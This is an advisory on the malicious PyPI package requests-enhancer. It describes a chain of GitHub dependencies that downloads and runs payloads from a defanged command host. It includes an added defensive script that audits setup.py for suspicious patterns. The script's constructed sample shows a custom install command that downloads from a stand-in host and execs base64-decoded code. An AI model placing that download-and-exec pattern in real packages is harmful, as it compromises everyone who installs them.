MAL-2026-6247
Malicious code in requests-enhancer (PyPI)
Details
## Source: kam193 (950c9d9155d6ba10a8d63c365fc6c7cc97d8bc6210165f93282d9e198ed3dd62)

Malicious package with a chain of several manually fetched dependencies that finally download the malicious code. During import, it manually downloads a dependency from the GitHub repository "Hexa-devy/netflow-utils", which in turn attempts to download "codexio-boop/platform_syslib". The last one contains obfuscated code that, during installation, connects to node22.lunes[.]host:3258 and downloads an encrypted payload. The payload is executed, and it then starts another loop of connections to node22.lunes[.]host:22240 and awaits further payloads to execute. During analysis, this stage did not deliver any payload. On every stage, short-lived generated tokens are used.
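The two warning signs in the report above, a dependency pulled straight from a URL rather than the package index and a setup.py that replaces the `install` command with its own class, can both be spotted statically before anything is installed. The following is an added example, not code from this advisory, from kam193's report or from any of the packages named; the setup.py it audits is a constructed sample, not the real requests-enhancer or platform_syslib source. For a pyproject.toml the same `find_direct_url_deps` check applies to the `project.dependencies` list after parsing the file with `tomllib`.

```python
"""Static audit for two supply-chain warning signs: direct-URL dependencies
and setuptools command overrides in setup.py. Added example, constructed
sample input; not the advisory's or the reported packages' code."""
import ast
import re

# PEP 508 direct reference, e.g. "foo @ git+https://github.com/org/repo".
# Such a dependency never passes through PyPI, so index-side scanning misses it.
_DIRECT_REF = re.compile(
    r"^\s*([A-Za-z0-9][A-Za-z0-9._-]*)\s*(?:\[[^\]]*\])?\s*@\s*(\S+)")

# Calls that are unusual inside a setuptools command class and worth review.
_SUSPICIOUS_CALLS = {"exec", "eval", "urlopen", "system", "Popen",
                     "check_output", "check_call", "b64decode", "decompress"}


def find_direct_url_deps(requirements):
    """Return (name, url) for every requirement that is a direct URL reference."""
    found = []
    for req in requirements:
        m = _DIRECT_REF.match(req)
        if m:
            found.append((m.group(1), m.group(2)))
    return found


def _call_name(node):
    """Last segment of a call target, e.g. 'urlopen' for urllib.request.urlopen()."""
    func = node.func
    if isinstance(func, ast.Attribute):
        return func.attr
    if isinstance(func, ast.Name):
        return func.id
    return None


def audit_setup_py(setup_py_text):
    """Parse setup.py without executing it and report:
    'install_requires': requirement strings given as literals,
    'cmdclass': setuptools commands replaced by custom classes,
    'suspicious_calls': {class name: sorted call names} for those classes."""
    tree = ast.parse(setup_py_text)
    classes = {n.name: n for n in ast.walk(tree) if isinstance(n, ast.ClassDef)}
    result = {"install_requires": [], "cmdclass": [], "suspicious_calls": {}}
    for node in ast.walk(tree):
        if not (isinstance(node, ast.Call) and _call_name(node) == "setup"):
            continue
        for kw in node.keywords:
            if kw.arg == "install_requires" and isinstance(kw.value, (ast.List, ast.Tuple)):
                result["install_requires"] = [
                    e.value for e in kw.value.elts
                    if isinstance(e, ast.Constant) and isinstance(e.value, str)]
            elif kw.arg == "cmdclass" and isinstance(kw.value, ast.Dict):
                for key, val in zip(kw.value.keys, kw.value.values):
                    if not (isinstance(key, ast.Constant) and isinstance(val, ast.Name)):
                        continue
                    result["cmdclass"].append(key.value)
                    cls = classes.get(val.id)
                    if cls is None:
                        continue  # class defined elsewhere; still flagged via cmdclass
                    calls = {_call_name(c) for c in ast.walk(cls) if isinstance(c, ast.Call)}
                    hits = sorted(calls & _SUSPICIOUS_CALLS)
                    if hits:
                        result["suspicious_calls"][val.id] = hits
    return result


# Constructed sample mirroring the pattern described (hypothetical names/URL).
SAMPLE_SETUP_PY = '''
from setuptools import setup
from setuptools.command.install import install
import base64, urllib.request

class CustomInstall(install):
    def run(self):
        blob = urllib.request.urlopen("http://example.invalid/stage").read()
        exec(base64.b64decode(blob))
        install.run(self)

setup(
    name="example-pkg",
    install_requires=[
        "requests>=2.0",
        "helper-lib @ git+https://github.com/example-org/helper-lib",
    ],
    cmdclass={"install": CustomInstall},
)
'''


def audit_sample():
    """Run both checks over the constructed sample and merge the findings."""
    report = audit_setup_py(SAMPLE_SETUP_PY)
    report["direct_url_deps"] = find_direct_url_deps(report["install_requires"])
    return report


if __name__ == "__main__":
    for key, value in audit_sample().items():
        print(f"{key}: {value}")
```

The audit never imports or runs setup.py, so it is safe to point at untrusted sdists. A `cmdclass` entry alone is common in legitimate packages; the combination with a direct-URL dependency or with download-and-exec style calls inside the override is what warrants manual review before installation.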
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-06-requests-enhancer
Reasons (based on the campaign):
- backdoor
- The package overrides the install command in setup.py to execute malicious code during installation.
- obfuscation
- The malicious code is intentionally included in a dependency of the package.
- The package contains code to execute remote commands (probably limited to a specific set) on the victim's machine.
Affected packages
No fixed version published yet for requests-enhancer (pip). Pin to a known-safe version or switch to an alternative.
References
- https://github.com/Hexa-devy/netflow-utils/blob/4f33b53019b11b99889ec860d486d550701f6e9d/pyproject.toml#L35 [WEB]
- https://github.com/codexio-boop/platform_syslib/blob/236340da65e23865eb1a9a6e4ed94d163ae80452/setup.py [WEB]
- https://github.com/codexio-boop/platform_syslib/blob/236340da65e23865eb1a9a6e4ed94d163ae80452/connkit/__init__.py [WEB]
- https://bad-packages.kam193.eu/pypi/package/requests-enhancer [WEB]